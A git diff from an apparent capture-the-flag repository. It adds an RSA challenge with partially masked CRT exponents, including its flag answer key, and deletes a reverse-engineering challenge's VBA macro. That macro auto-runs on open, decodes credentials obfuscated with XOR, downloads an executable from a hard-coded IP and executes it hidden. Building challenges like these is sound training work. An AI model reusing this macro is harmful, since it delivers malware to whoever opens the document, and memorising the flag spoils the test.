diff --git a/Cryptography/redacted-remainders/README.md b/Cryptography/redacted-remainders/README.md new file mode 100644 index 0000000..b1de6d6 --- /dev/null +++ b/Cryptography/redacted-remainders/README.md @@ -0,0 +1 @@ +# to-do \ No newline at end of file diff --git a/Cryptography/redacted-remainders/challenge.yml b/Cryptography/redacted-remainders/challenge.yml new file mode 100644 index 0000000..8177da9 --- /dev/null +++ b/Cryptography/redacted-remainders/challenge.yml @@ -0,0 +1,29 @@ +name: "Redacted Remainders" +category: Cryptography +description: |- + It's 4 AM right now and I'm so tired, surely nothing bad will happen if I publish this challenge right? + + Author: ringoshiro + +##### DON'T CHANGE +value: 500 +type: dynamic +extra: + initial: 500 + decay: 30 + minimum: 100 +##### DON'T CHANGE + +flags: + - BEECTF{b1t5_0f_ch1n3s3_c03ff5} + +tags: + - medium + +files: + - dist/chall.py + - dist/output.txt + +state: hidden + +version: "0.1" diff --git a/Cryptography/redacted-remainders/dist/chall.py b/Cryptography/redacted-remainders/dist/chall.py new file mode 100644 index 0000000..0a666c5 --- /dev/null +++ b/Cryptography/redacted-remainders/dist/chall.py @@ -0,0 +1,67 @@ +from Crypto.Util.number import getPrime, inverse, bytes_to_long +import random, math +from textwrap import wrap + +LR = 0.28 +GROUP = 4 +FKP = 24 +FKS = 24 + +def mask_bits_as_r(bs: str, hr: float, fp: int, fs: int) -> str: + n = len(bs) + alw_ids = list(range(n)) + if fp > 0: + alw_ids = alw_ids[fp:] + if fs > 0: + alw_ids = [i for i in alw_ids if i < n - fs] + to_hide_target = int(hr * len(alw_ids)) + to_hide = set(random.sample(alw_ids, k=min(to_hide_target, len(alw_ids)))) + masked = [] + for i, b in enumerate(bs): + if (fp and i < fp) or (fs and i >= n - fs): + masked.append(b) + elif i in to_hide: + masked.append('r') + else: + masked.append(b) + return ''.join(masked) + +def groupify(s: str, size: int) -> str: + return ' '.join(wrap(s, size)) + +def int_to_bin(x: int) -> str: + return bin(x)[2:] + +flag = open("flag.txt", "rb").read().strip() +e = 4099 +while True: + p = getPrime(128) + q = getPrime(128) + n = p * q + phi = (p - 1) * (q - 1) + if math.gcd(e, phi) != 1: + continue + d = inverse(e, phi) + dp = d % (p - 1) + dq = d % (q - 1) + kp = (e * dp - 1) // (p - 1) + kq = (e * dq - 1) // (q - 1) + if kp == 0 or kq == 0: + continue + break +m = bytes_to_long(flag) +if m >= n: + raise ValueError("flag too large for modulus") +c = pow(m, e, n) +dp_bits = int_to_bin(dp) +dq_bits = int_to_bin(dq) +masked_dp = mask_bits_as_r(dp_bits, LR, FKP, FKS) +masked_dq = mask_bits_as_r(dq_bits, LR, FKP, FKS) +dp = groupify(masked_dp, GROUP) +dq = groupify(masked_dq, GROUP) +with open("output.txt", "w") as f: + f.write(f"n={n}\n") + f.write(f"e={e}\n") + f.write(f"c={c}\n") + f.write(f"dp={dp}\n") + f.write(f"dq={dq}\n") \ No newline at end of file diff --git a/Cryptography/redacted-remainders/dist/output.txt b/Cryptography/redacted-remainders/dist/output.txt new file mode 100644 index 0000000..3c7d69d --- /dev/null +++ b/Cryptography/redacted-remainders/dist/output.txt @@ -0,0 +1,5 @@ +n=59213204637068816907517582537717244881250709490610600160235894584144862180589 +e=4099 +c=52598477212363693322221974252387327725937369173109674066499283883678096102095 +dp=1010 0010 0100 1111 1100 1101 r01r 0011 0101 r010 00r1 0r0r 11r0 0101 0r00 0001 rr01 1r01 1rr1 1r01 r1r1 rr01 01r1 001r 0r01 1111 1000 1011 1101 1110 1010 11 +dq=1010 1110 0110 1001 1000 1011 0101 11rr 1000 0101 1100 110r 1r10 r110 0rr1 011r 110r rrr0 1r1r 01rr r110 1011 0rr1 1100 110r r1r0 1101 0001 0010 1001 1101 011 diff --git a/Reverse Engineering/cotton-candy/dist/chall.zip b/Reverse Engineering/cotton-candy/dist/chall.zip deleted file mode 100644 index ffdf384..0000000 Binary files a/Reverse Engineering/cotton-candy/dist/chall.zip and /dev/null differ diff --git a/Reverse Engineering/cotton-candy/src/malicious.vba b/Reverse Engineering/cotton-candy/src/malicious.vba deleted file mode 100644 index 51c3244..0000000 --- a/Reverse Engineering/cotton-candy/src/malicious.vba +++ /dev/null @@ -1,55 +0,0 @@ -Function Decrypt(enc, key) As String - Dim dec As String - Dim i As Integer - - For i = LBound(enc) To UBound(enc) - dec = dec & Chr(enc(i) Xor key) - Next i - - Decrypt = dec -End Function - -Function GetUsername() As String - Dim EncUser As Variant - EncUser = Array(107, 126, 111, 114, 105) - - GetUsername = Decrypt(EncUser, 27) -End Function - -Function GetPassword() As String - Dim EncPass As Variant - EncPass = Array(44, 61, 124, 58, 37, 124, 38, 60, 41, 42) - - GetPassword = Decrypt(EncPass, 72) -End Function - -Sub AutoOpen() - Dim fso As Object - Set fso = CreateObject("Scripting.FileSystemObject") - Dim opath As String - opath = Environ("USERPROFILE") & "\Downloads" - - Dim http As Object - Set http = CreateObject("WinHttp.WinHttpRequest.5.1") - Dim bStrm As Object - Set bStrm = CreateObject("ADODB.Stream") - - Dim url As String - url = "http://31.97.187.222:6969/download?user=" & GetUsername() & "&pass=" & GetPassword() - - http.Open "GET", url, False - http.Send - - If http.Status = 200 Then - With bStrm - .Type = 1 - .Open - .Write http.responseBody - .SaveToFile opath & "\not-a-malware.exe", 2 - End With - Else - MsgBox "Please Contact Problem Setter: " & http.Status - End If - CreateObject("WScript.Shell").Run opath & "\not-a-malware.exe", 0 -End Sub -